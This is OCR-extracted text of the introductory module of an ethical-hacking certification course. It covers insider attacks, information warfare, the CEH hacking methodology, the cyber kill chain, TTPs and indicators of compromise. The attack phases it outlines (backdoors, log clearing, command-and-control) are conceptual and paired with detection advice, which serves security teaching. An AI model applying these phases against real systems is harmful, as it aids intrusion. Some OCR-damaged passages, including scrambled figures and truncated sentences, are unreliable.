Insider Attacks Insider attacks are performed by trusted persons who have physical access to the critical assets of the target. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. They misuse the organization’s assets to directly affect the confidentiality, integrity, and availability of information systems. These attacks impact the organization’s business operations, reputation, and profit. It is difficult to figure out an insider attack Examples of insider attacks: o

Eavesdropping and wiretapping

Module 01 Page 9

o

Theft of physical devices

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

=

o

Social engineering

o

Data theft and spoliation

o

Pod slurping

Exam 312-50 Certified Ethical Hacker o

Planting keyloggers, backdoors, or malware

Distribution Attacks Distribution attacks occur when attackers tamper with hardware or software prior installation. Attackers tamper the hardware or software at its source or when it is transit. Examples of distribution attacks include backdoors created by software hardware vendors at the time of manufacture. Attackers leverage these backdoors gain unauthorized access to the target information, systems, or network. o

Modification of software or hardware during production

o

Modification of software or hardware during distribution

Module 01 Page 10

to in or to

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Introduction to Ethical Hacking

Information Warfare ‘@

¢ EH

The term information warfare or InfoWar refers to the use of information and communication technologies (ICT)

to gain competitive advantages over an opponent

{ Defensive Information Warfare

}

{ Offensive Information Warfare

Refers to all strategiesand actions designed to defend against attacks on ICT assets

ga

Defensive Warfare Pi

revention iti

Deterrence

Refers to information warfare thatinvolves attacks against the ICT assets of an opponent

'

|

wacom eas Web Server Attacks

Alerts @

}

Detection

Emergency

(MITM Attacks

Preparedness

System Hacking

Response

Information Warfare Source: https://iwar.org.uk

The term information warfare or InfoWar refers technologies (ICT) for competitive advantages warfare weapons include viruses, worms, nanomachines and microbes, electronic jamming,

to the use of information and communication over an opponent. Examples of information Trojan horses, logic bombs, trap doors, and penetration exploits and tools.

Martin Libicki divided information warfare into the following categories:

Intelligence-based warfare: Intelligence-based warfare is a sensor-based technology that directly corrupts technological systems. According to Libicki, “intelligence-based je design, protection, and denial of systems that he battlespace.

ctdomyus

=

ki, electronic warfare uses radio-electronic and communication. Radio electronic techniques information, whereas cryptographic techniques of sending information.

oy

Command and control warfare (C2 warfare): In the computer security industry, C2 warfare refers to the impact an attacker possesses over a compromised system or network that they control.

arfare is the use of various techniques such as e’s adversary in an attempt to succeed in battle.

¢r

=

e purpose of this type of warfare can vary from , theft of information, theft of services, system

Module 01 Page 11

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

monitoring, false messaging,

and access to data. Hackers generally use viruses, logic

bombs, Trojan horses, and sniffers to perform these attacks.

Economic warfare: Libicki notes that economic information warfare can affect the economy of a business or nation by blocking the flow of information. This could be especially devastating to organizations that do a lot of business in the digital world. Cyberwarfare: Libicki defines cyber warfare as the use of information systems against the virtual personas of individuals or groups. It is the broadest of all information warfare. It includes information terrorism, semantic attacks (similar to Hacker warfare,

but instead of harming a system, it takes over the system while maintaining the perception that it is operating correctly), and simula-warfare (simulated war, for example, acquiring weapons for mere demonstration rather than actual use). Each form of information warfare mentioned strategies. =

Defensive Information Warfare: attacks on ICT assets.

above consists of both defensive and offensive

Involves all strategies and actions to defend against

Offensive Information Warfare: Involves attacks against the ICT assets of an opponent. Defensive Warfare

p=

Prevention

Deterrence \

Alerts

@

betection



Emergency

=|

|BBq



Preparedness

Offensive Warfare

1

iN

Web Application Attacks

3

Web Server Attacks

° e

| c R

-

Malware Attacks

1

MITM Attacks

u

System Hacking

Response

p=

@ [=] F|



Figure 1.1: Block Diagram of Information Warfare

Module 01 Page 12

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LO#02: Explain Hacking Methodologies and Frameworks

copyright © by

Reproductions

Strictly Prohibited

Hacking Methodologies and Frameworks Learning the hacking methodologies and frameworks helps ethical hackers understand the phases involved in hacking attempts along with the tactics, techniques, and procedures used by real hackers. This knowledge further helps them in strengthening the security infrastructure of their organization. This section discusses various hacking methodologies such as the Certified Ethical Hacker (CEH) methodology, cyber kill chain methodology, MITRE attack framework, and Diamond Model of Intrusion Analysis.

Module 01 Page 13

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

CEH Hacking Methodology (CHM) System Hacking Gaining Access Cracking Passwords Vulnerability Exploitation

Scanning

Escalating Privileges Maintaining Access Executing Applications

Enumeration

; ke

Hiding Files Vulnerability Analysis

Clearing Logs Covering Tracks

CEH Hacking Methodology (CHM) EC-council’s CEH hacking methodology (CHM) defines the step-by-step process to perform ethical hacking. The CHM follows the same process as that of an attacker, and the only differences are in its hacking goals and strategies. This methodology helps security professionals and ethical hackers understand the various phases followed by real hackers in order to achieve their objectives. An understanding of the CHM helps ethical hackers learn various tactics, techniques, and tools used by attackers at various phases of hacking, which further guide them to succeed in the ethical hacking process.

Footprinting

System Hacking Gaining Access Cracking Passwords

Scanning

Vulnerability Exploitation Escalating Privileges

Enumeration

Vulnerability Analysis

:

Maintaining Access

Executing Applications

le _

Hiding Files Clearing Logs

Covering Tracks

Figure 1.2: EC-council’s CEH hacking methodology (CHM)

Module 01 Page 14

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

According to the CHM, the following are the various phases involved in hacking. Footprinting

Footprinting and reconnaissance constitute the preparatory phase, in which an attacker gathers as much information as possible about the target prior to launching an attack. In this phase, the attacker creates a profile of the target organization and obtains information such as its IP address range, namespace, and employees. Footprinting facilitates system hacking by revealing vulnerabilities. For example, the organization’s website may provide employee biographies or a personnel directory, which the hacker can use for social engineering. Conducting a Whois query on the web can provide information about the networks and domain names associated with a specific organization. The footprinting target range may include the target organization’s clients, employees, operations, network, and systems. Note: Footprinting Reconnaissance.

techniques

are

covered

in

Module

02:

Footprinting

and

Scanning

Scanning is used to identify active hosts, open ports, and unnecessary services enabled on particular hosts. In this phase, the attacker uses the details gathered during reconnaissance to scan the network for specific information. Scanning is a logical extension of active reconnaissance; in fact, some experts do not differentiate scanning from active reconnaissance. However, there is a slight difference in that scanning involves more in-depth probing by the attacker. Often, the reconnaissance and scanning phases overlap, and it is not always possible to separate them. Note: Scanning techniques are covered in Module 03: Scanning Networks. Enumeration Enumeration involves making active connections to a target system or subjecting it to direct queries. It is a method of intrusive probing through which attackers gather information such as network user lists, routing tables, security flaws, shared users, groups, applications, and banners.

Note: Enumeration techniques are covered in Module 04: Enumeration. Vulnerability Analysis Vulnerability assessment is the examination of the ability of a system or application, including its current security procedures and controls, to withstand assault. It recognizes, measures, and classifies security vulnerabilities in computer systems, networks, and communication channels. Attackers perform vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems. The identified vulnerabilities are used by attackers to perform further exploitation of the target network. Note: Vulnerability Analysis. Module 01 Page 15

assessment

concepts

are

discussed

in Module

05:

Vulnerability

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

System Hacking Attackers follow a certain methodology to hack a system. They first obtain information during the footprinting, scanning, enumeration, and vulnerability analysis phases, which they then use to exploit the target system. o

Gaining Access

This is the phase in which actual hacking occurs. The previous phases help attackers identify security loopholes and vulnerabilities in the target organizational IT assets. Attackers use this information, along with techniques such as password cracking and the exploitation of vulnerabilities including buffer overflows, to gain access to the target organizational system. Gaining access refers to the point at which the attacker obtains access to the operating system (OS) or applications on a computer or network. A hacker’s chances of gaining access to a target system depend on several factors, such as the architecture and configuration of the target system, the perpetrator’s skill level, and the initial level of access obtained. Once an attacker gains access to the target system, they attempt to escalate privileges to obtain complete control. In this process, they also compromise the intermediate systems connected to it. Escalating Privileges After gaining access to a system using a low-privilege user account, the attacker may attempt to increase their privileges to the administrator level to perform protected system operations so that they can proceed to the next level of the system hacking phase, which is the execution of applications. The attacker exploits known system vulnerabilities to escalate user privileges. Maintaining Access

Maintaining access refers to the phase in which an attacker attempts to retain ownership of the system. Once an attacker gains access to the target system with admin- or root-level privileges (thus owning the system), they can use both the system and its resources at will. The attacker can either use the system as a launchpad to scan and exploit other systems or maintain a low profile and continue exploitation. Both of these actions can cause significant damage. Attackers can upload, download, or manipulate data, applications, and configurations on the owned system and also use malicious software to transfer usernames, passwords, and any other information stored in the system. They can maintain control over the system for a long time by closing vulnerabilities to prevent other hackers from exploiting them. Occasionally, in the process, the attacker may provide some degree of protection to the system from other attacks. Attackers use compromised systems to launch further attacks.

Module 01 Page 16

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking o

Exam 312-50 Certified Ethical Hacker

Clearing Logs To remain undetected, it is important for attackers to erase all the evidence of security compromise from the system. To achieve this, they might modify or delete logs in the system using certain log-wiping utilities, thus removing all evidence of their presence.

Note: The complete system hacking process is covered in Module 06: System Hacking.

Module 01 Page 17

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Cyber Kill Chain Methodology

@ The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities @ It provides greater insight into attack phases, which helps security professionals to understand the adversary’s tactics, techniques, and procedures beforehand Createa deliverable ‘malicious payload using an exploit and a backdoor Weaponization

Reconnaissance Gather data on the target to probe for weak points

Exploit a vulnerability by executing code on the victim's system Exploitation

Delivery Send weaponized bundle to the victim using email, USB, etc.

Create a command and control channel to communicateand ppass data back and forth Command and Control

Installation Install malware on the target system

Actions on Objectives Perform actions to achieve intended objectives/goals

Cyber Kill Chain Methodology The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities. This methodology helps security professionals in identifying the steps that adversaries follow in order to accomplish their goals. The cyber kill chain is a framework developed for securing cyberspace based on the concept of military kill chains. This method aims to actively enhance intrusion detection and response. The cyber kill chain is equipped with a seven-phase protection mechanism to mitigate and reduce cyber threats. According to Lockheed Martin, cyberattacks might occur in seven different phases, from reconnaissance to the final accomplishment of the objective. An understanding of cyber kill chain methodology helps security professionals to leverage security controls at different stages of an attack and helps them to prevent the attack before it succeeds. It also provides greater insight into the attack phases, which helps in understanding the adversary’s TTPs beforehand.

Module 01 Page 18

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Discussed below are various phases included in cyber kill chain methodology: Create a deliverable

Exploit a vulnerability

Create a command and control

an exploit and a backdoor

the victim’s system

pass data back and forth

malicious payload using Weaponization

Reconnaissance Gather data on the target to probe for weak points

by executing code on

channel to communicate and

Exploitation

Delivery Send weaponized bundle to the victim using email, USB, etc.

Command and Control

Installation Install malware on the target system

Actions on Objectives Perform actions to achieve intended objectives/goals

Figure 1.3: Cyber kill chain methodology

=

Reconnaissance An adversary performs reconnaissance to collect as much information about the target as possible to probe for weak points before actually attacking. They look for information such as publicly available information on the Internet, network information, system information, and the organizational information of the target. By conducting reconnaissance across different network levels, the adversary can gain information such as network blocks, specific IP addresses, and employee details. The adversary may use automated tools to obtain information such as open ports and services, vulnerabilities in applications, and login credentials. Such information can help the adversary in gaining backdoor access to the target network. Activities of the adversary include the following:

=

o

Gathering information about the target organization by searching the Internet or through social engineering

o

Performing analysis of various online activities and publicly available information

o

Gathering information from social networking sites and web services

o

Obtaining information about websites visited

o

Monitoring and analyzing the target organization’s website

o

Performing Whois, DNS, and network footprinting

o

Performing scanning to identify open ports and services

Weaponization

The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access malware

Module 01 Page 19

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific network devices, operating systems, endpoint devices, or even individuals within the organization to carry out their attack. For example, the adversary may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary. The following are the activities of the adversary:

=

o

Identifying appropriate malware payload based on the analysis

o

Creating a new malware payload or selecting, reusing, modifying the available malware payloads based on the identified vulnerability

o

Creating a phishing email campaign

o

Leveraging exploit kits and botnets

Delivery The previous stage included creating a weapon. Its payload is transmitted to the intended victim(s) as an email attachment, via a malicious link on websites, or through a vulnerable web application or USB drive. Delivery is a key stage that measures the effectiveness of the defense strategies implemented by the target organization based on whether the intrusion attempt of the adversary is blocked or not. The following are the activities of the adversary:

=

o

Sending phishing emails to employees of the target organization

o

Distributing USB drives containing malicious payload to employees of the target organization

o

Performing attacks such as watering hole on the compromised website

o

Implementing various hacking tools against the operating systems, applications, and servers of the target organization

Exploitation After the weapon is transmitted to the intended victim, exploitation triggers the adversary’s malicious code to exploit a vulnerability in the operating system, application, or server on a target system. At this stage, the organization may face threats such as authentication and authorization attacks, arbitrary code execution, physical security threats, and security misconfiguration.

Activities of the adversary include the following: o

Exploiting software or hardware vulnerabilities to gain remote access to the target

system

Module 01 Page 20

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking =

Exam 312-50 Certified Ethical Hacker

Installation The adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period. They may use the weapon to install a backdoor to gain remote access. After the injection of the malicious code on one target system, the adversary gains the capability to spread the infection to other end systems in the network. Also, the adversary tries to hide the presence of malicious activities from security controls like firewalls using various techniques such as encryption.

The following are the activities of the adversary:

=

o

Downloading and installing malicious software such as backdoors

o

Gaining remote access to the target system

o

Leveraging various methods to keep backdoor hidden and running

©

Maintaining access to the target system

Command and Control The adversary creates a command and control channel, which establishes two-way communication between the victim’s system and adversary-controlled server to communicate and pass data back and forth. The adversaries implement techniques such as encryption to hide the presence of such channels. Using this channel, the adversary performs remote exploitation on the target system or network. The following are the activities of the adversary:

=

o

Establishing a two-way communication channel between the victim’s system and the adversary-controlled server

o

Leveraging channels such as web traffic, email communication, and DNS messages.

o

Applying privilege escalation techniques

o

Hiding any evidence of compromise using techniques such as encryption

Actions on Objectives

The adversary controls the victim’s system from a remote location and finally accomplishes their intended goals. The adversary gains access to confidential data, disrupts the services or network, or destroys the operational capability of the target by gaining access to its network and compromising more systems. Also, the adversary may use this as a launching point to perform other attacks.

Module 01 Page 21

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Tactics, Techniques, and Procedures (TTPs)

CEH

:

| The term Tactics, Techniques, and Procedures (TTPs) refers to the patterns of activities and methods associated | with specific threat actors or groups of threat actors

4

L

@

“Tactics” are the guidelines that

describe the way an attacker performs the attack from

|@ This guideline consists of the various tactics for information gathering to perform initial exploitation, privilege escalation, and lateral movement, and to deploy measures for persistent access to the system and other

Tactics, Techniques,

@

“Techniques” are the technical

methods used by an attacker

@

e These techniques include initial exploitation, setting up and maintainingcommand and control channels, accessing the

“Procedures” are organizational

approaches that threat actors follow to launch an attack

to achieve intermediate results

during the attack

beginningto the end

purposes

Procedures

Techniques

Tactics

;

@ The number of actions usually differs dependingon the objectives of the procedure and threat actor group

target infrastructure, covering

the tracks of data exfiltration, and others

and Procedures (TTPs)

The terms “tactics, techniques, and procedures” refer to the patterns of activities and methods associated with specific threat actors or groups of threat actors. TTPs are helpful in analyzing threats and profiling threat actors and can further be used to strengthen the security infrastructure of an organization. The word “tactics” is defined as a guideline that describes the way an attacker performs their attack from beginning to end. The word “techniques” is defined as the technical methods used by an attacker to achieve intermediate results during their attack. Finally, the word “procedures” is defined as the organizational approach followed by the

threat actors to launch their attack. In order to understand and defend against the threat actors, it is important to understand the TTPs used by adversaries. Understanding the tactics of an attacker helps to predict and detect evolving threats in the early stages. Understanding the techniques used by attackers helps to identify vulnerabilities and implement defensive measures in advance. Lastly, analyzing the procedures used by the attackers helps to identify what the attacker is looking for within the target organization’s infrastructure. Organizations should understand TTPs to protect their network against threat actors and upcoming attacks. TTPs enable the organizations to stop attacks at the initial stage, thereby protecting the network against massive damages. =

Tactics Tactics describe the way the threat actor operates during different phases of an attack. It consists of the various tactics used to gather information

for the initial exploitation,

perform privilege escalation and lateral movement, and deploy measures for persistence access to the system. Generally, APT groups depend on a certain set of unchanging tactics, but in some cases, they adapt to different circumstances and alter

Module 01 Page 22

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

the way they perform their attacks. Therefore, the difficulty of detecting and attributing the attack campaign depends on the tactics used to perform the attack.

An organization can profile threat actors based on tactics they use; this consists of the way they gather information about a target, the methods they follow for initial compromise, and the number of entry points they use while attempting to enter the target network. For example, to obtain information, some threat actors depend solely on information available on the Internet, whereas others might perform social engineering or use connections in intermediate organizations. Once information such as the email addresses of employees of the target organization is gathered, the threat actors either choose to approach the target one by one or as a group. Furthermore, the attackers’ designed payload can stay constant from the beginning to the end of the attack or may be changed based on the targeted individual. Therefore, to understand the threat actors better, tactics used in the early stages of an attack must be analyzed properly.

Another method of analyzing the APT groups is inspecting the infrastructure and tools used to perform their attack. For example, consider establishing a command and control channel on the servers controlled by the attacker. These C&C servers may be located within a specific geographical location or may spread across the Internet and can be static or can change dynamically. It is also important to analyze the tools used to perform the attack. This includes analyzing the exploits and tools used by various APT groups. In such a scenario, a sophisticated threat actor may exploit many zero-day vulnerabilities by using adapted tools and obfuscation methods. However, this might be difficult as less-sophisticated threat actors generally depend on publicly known vulnerabilities and open-source tools. Identifying this type of tactic helps in profiling the APT groups and building defensive measures in advance. In some cases, understanding the tactics used in the last stages of an attack helps in profiling the threat actor. Also, the methods used to cover the tracks help the target organization understand attack campaigns. Analyzing the tactics used by the attackers helps in creating an initial profile by understanding different phases of an APT life cycle. This profile helps in performing further analysis of the techniques and procedures used by the attackers. An attacker may continually change the TTPs used, so it is important to constantly review and update the tactics used by the APT groups. =

Techniques To launch an attack successfully, threat actors use several techniques during its execution. These techniques include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, and covering the tracks of data exfiltration. The techniques followed by the threat actor to conduct an attack might vary, but they are mostly similar and can be used for profiling. Therefore, understanding the techniques used in the different phases of an attack is essential to analyzing the threat groups effectively.

Module 01 Page 23

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Techniques can also be analyzed at each stage of the threat life cycle. Therefore, the techniques at the initial stage mainly describe the tools used for information gathering and initial exploitation. The techniques used in this stage need not necessarily have a technical aspect. For example, in social engineering, certain non-technical software tools are used as an effective way of gathering information. An attacker can use such tools to obtain the email addresses of target organization employees through publicly available

resources.

In the same manner, purely human-based social engineering can be used to perform the initial exploitation. For example, consider a scenario where the victim is tricked via a phone call to reveal their login credentials for accessing the target organization’s internal network. These techniques are used in the initial phase of an attack to gather information about the target and break the first line of defense.

Techniques used in the middle stages of an attack mostly depend on technical tools for initially escalating privileges on systems that are compromised or performing lateral movements within the target organization’s network. At this stage of an attack, the attackers use various exploits or misuse configuration vulnerabilities on the target system. They may also exploit network design flaws to gain access to other systems in the network. In all of these cases, either exploits or a collection of tools allows the attacker to perform a successful attack. In this scenario, the term “technique” is the set of tools and

the way they are used

to obtain

intermediate

results during

an attack

The techniques in the last stage of an attack can have both technical and nontechnical aspects. In such a scenario, the techniques used for data-stealing are usually based on network technology and encryption. For example, the threat actor encrypts the stolen files, transfers them through the established command and control channel, and copies them to their own system. After successfully executing the attack and transferring the files, the attacker follows certain purely technical techniques to cover their tracks. They use automated software tools to clear logs files to evade detection. After aggregating the techniques used in all the stages of an attack, the organization can use the information to profile the threat actors. In order to make an accurate attribution of threat actors, the organization must observe all the techniques used by its adversaries.

=

Procedures “Procedures” involve a sequence of actions performed by the threat actors different steps of an attack life cycle. The number of actions usually differs upon the objectives of the procedure and the APT group. An advanced threat advanced procedures that consist of more actions than a normal procedure the same intermediate result. This is done mainly to increase the success attack and decrease the probability of detection by security mechanisms.

to execute depending actor uses to achieve rate of an

For example, in a basic procedure of information gathering, an actor information about the target organization; identifies key targets, employees;

Module 01 Page 24

collects collects

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

their contact details, identifies vulnerable systems and potential entry points to the target network, and documents all the collected information. The further actions of an adversary depend on the tactics used. These actions include extensive research and repeated information gathering to collect in-depth and up-to-date information on the target individuals via social networking sites. This information can assist threat actors in performing spear phishing, monitoring security controls to identify zero-day exploits in the target systems, and other tasks. For example, a threat actor using a more detailed procedure executes the malware payload. At the time of execution, the malicious code decrypts itself, evades security monitoring controls, deploys persistence, and establishes a command and control channel for communicating with the victim system. This type of procedure is common for malware, where different threat actors may implement the same feature, and hence it is useful in forensic investigations. An understanding and proper analysis of the procedures followed by certain threat actors during an attack helps organizations profile threat actors. In the initial stage of an attack, such as during information gathering, observing the procedure of an APT group is difficult. However, the later stages of an attack can leave trails that may be used to understand the procedures the attacker followed.

Adversary Behavioral Identification Adversary behavioral identification involves the identification of the common methods or techniques followed by an adversary to launch attacks to penetrate an organization’s network. It gives security professionals insight into upcoming threats and exploits. It helps them plan network security infrastructure and adapt a range of security procedures as prevention against various cyberattacks. Given below are some of the behaviors detection capabilities of security devices: Internal

of an adversary that can

be used to enhance

the

Reconnaissance

Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance. This includes the enumeration of systems, hosts, processes, the execution of various commands to find out information such as the local user context and system configuration, hostname, IP addresses, active remote systems, and programs running on the target systems. Security professionals can monitor the activities of an adversary by checking for unusual commands executed in the Batch scripts and PowerShell and by using packet capturing tools.

Use of PowerShell PowerShell can be used by an adversary as a tool for automating data exfiltration and launching further attacks. To identify the misuse of PowerShell in the network, security professionals can check PowerShell’s transcript logs or Windows Event logs. The user agent string and IP addresses can also be used to identify malicious hosts who try to exfiltrate data.

Module 01 Page 25

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking =

Exam 312-50 Certified Ethical Hacker

Unspecified Proxy Activities An adversary can create and configure multiple domains pointing to the same host, thus, allowing an adversary to switch quickly between the domains to avoid detection. Security professionals can find unspecified domains by checking the data feeds that are generated by those domains. Using this data feed, the security professionals can also find any malicious files downloaded and the unsolicited communication with the outside network based on the domains.

=

Use of Command-Line Interface On gaining access to the target system, an adversary can make use of the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code. Security professionals can identify this behavior of an adversary by checking the logs for process ID, processes having arbitrary letters and numbers, and malicious files downloaded from the Internet.

"HTTP User Agent In HTTP-based communication, the server identifies the connected HTTP client using the user agent field. An adversary modifies the content of the HTTP user agent field to communicate with the compromised system and to carry further attacks. Therefore, security professionals can identify this attack at an initial stage by checking the content of the user agent field.

=

Command and Control Server Adversaries use command and control servers to communicate remotely with compromised systems through an encrypted session. Using this encrypted channel, the adversary can steal data, delete data, and launch further attacks. Security professionals can detect compromised hosts or networks by identifying the presence of a command and control server by tracking network traffic for outbound connection attempts, unwanted open ports, and other anomalies.

=

Use of DNS Tunneling Adversaries use DNS tunneling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network. Using DNS tunneling, an adversary can also communicate with the command and control server, bypass security controls, and perform data exfiltration. Security professionals can identify DNS tunneling by analyzing malicious DNS requests, DNS payload, unspecified domains, and the destination of DNS requests.

=

Use of Web Shell An adversary uses a web shell to manipulate the web server by creating a shell within a website; it allows an adversary to gain remote access to the functionalities of a server. Using a web shell, an adversary performs various tasks such as data exfiltration, file transfers, and file uploads. Security professionals can identify the web shell running in

Module 01 Page 26

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

the network by analyzing server access, error logs, suspicious encoding, user agent strings, and through other methods. =

strings that

indicate

Data Staging

After successful penetration into a target’s network, the adversary uses data staging techniques to collect and combine as much data as possible. The types of data collected by an adversary include sensitive data about the employees and customers, the business tactics of an organization, financial information, and network infrastructure information. Once collected, the adversary can either exfiltrate or destroy the data. Security professionals can detect data staging by monitoring network traffic for malicious file transfers, file integrity monitoring, and event logs. Indicators of Compromise

(IoCs)

Cyber threats are continuously evolving with the newer TTPs adapted based on the vulnerabilities of the target organization. Security professionals must perform continuous monitoring of loCs to effectively and efficiently detect and respond to evolving cyber threats. Indicators of Compromise are the clues, artifacts, and pieces of forensic data that are found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization’s infrastructure. However, loCs are not intelligence; rather, loCs act as a good source of information about threats that serve as data points in the intelligence process. Actionable threat intelligence extracted from loCs helps organizations enhance incident-handling strategies. Cybersecurity professionals use various automated tools to monitor loCs to detect and prevent various security breaches to the organization. Monitoring loCs also helps security teams enhance the security controls and policies of the organization to detect and block suspicious traffic to thwart further attacks. To overcome the threats associated with loCs, some organizations like STIX and TAXII have developed standardized reports that contain condensed data related to attacks and shared it with others to leverage the incident response. An loC is an atomic indicator, computed indicator, or behavioral indicator. It is the information regarding suspicious or malicious activities that is collected from various security establishments in a network’s infrastructure. Atomic indicators are those that cannot be segmented into smaller parts, and whose meaning is not changed in the context of an intrusion. Examples of atomic indicators are IP addresses and email addresses. Computed indicators are obtained from the data extracted from a security incident. Examples of computed indicators are hash values and regular expressions. Behavioral indicators refer to a grouping of both atomic and computed indicators, combined on the basis of some logic.

Categories of Indicators of Compromise The cybersecurity professionals must have proper knowledge about various possible threat actors and their tactics related to cyber threats, mostly called Indicators of Compromise (loCs). This understanding of loCs helps security professionals quickly detect the threats entering the organization and protect the organization from evolving threats.

Module 01 Page 27

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

For this purpose, loCs are divided into four categories: Email Indicators Attackers usually prefer email services to send malicious data to the target organization or individual. Such socially engineered emails are preferred due to their ease of use and comparative anonymity. Examples of email indicators include the sender’s email address, email subject, and attachments or links. Network Indicators Network indicators are useful for command and control, malware delivery, and identifying details about the operating system, browser type, and other computerspecific information. Examples of network indicators include URLs, domain names, and IP addresses.

Host-Based Indicators Host-based indicators are found by performing an analysis of the infected system within the organizational network. Examples of host-based indicators include filenames, file hashes, registry keys, DLLs, and mutex. Behavioral Indicators Generally, typical loCs are useful for identifying indications of intrusion, such as malicious IP addresses, virus signatures, MD5 hash, and domain names. Behavioral loCs are used to identify specific behavior related to malicious activities such as code injection into the memory or running the scripts of an application. Well-defined behaviors enable broad protection to block all current and future malicious activities. These indicators are useful to identify when legitimate system services are used for abnormal or unexpected activities. Examples of behavioral indicators include document executing PowerShell script, and remote command execution. Listed below are some of the key Indicators of Compromise (loCs): Unusual outbound network traffic Unusual activity through a privileged user account Geographical anomalies Multiple login failures Increased database read volume

Large HTML response size Multiple requests for the same file Mismatched port-application traffic Suspicious registry or system file changes Unusual DNS requests Unexpected patching of systems Module 01 Page 28

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

=

Signs of Distributed Denial-of-Service (DDoS) activity

=

Bundles of data in the wrong places

=

Web traffic with superhuman behavior

Module 01 Page 29

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

MITRE ATT&CK Framework 1 |

CE H

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations

2 | The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, government, and the cybersecurity product and service community | 3 |

The 14 tactic categories within ATT&CK for Enterprise are derived from the later stages (exploit, control, maintain, and

execute) of the seven stages of the Cyber Kill Chain

Recon

Weaponize

Deliver

Exploit

PRE-ATT&CK

Control

Execute

Enterprise ATT&CK

Copyright © by

MITRE ATT&CK

Maintain

ttes://attock mitre.org Al RightsReserved, Reproduction i Strictly Prohibited.

Framework

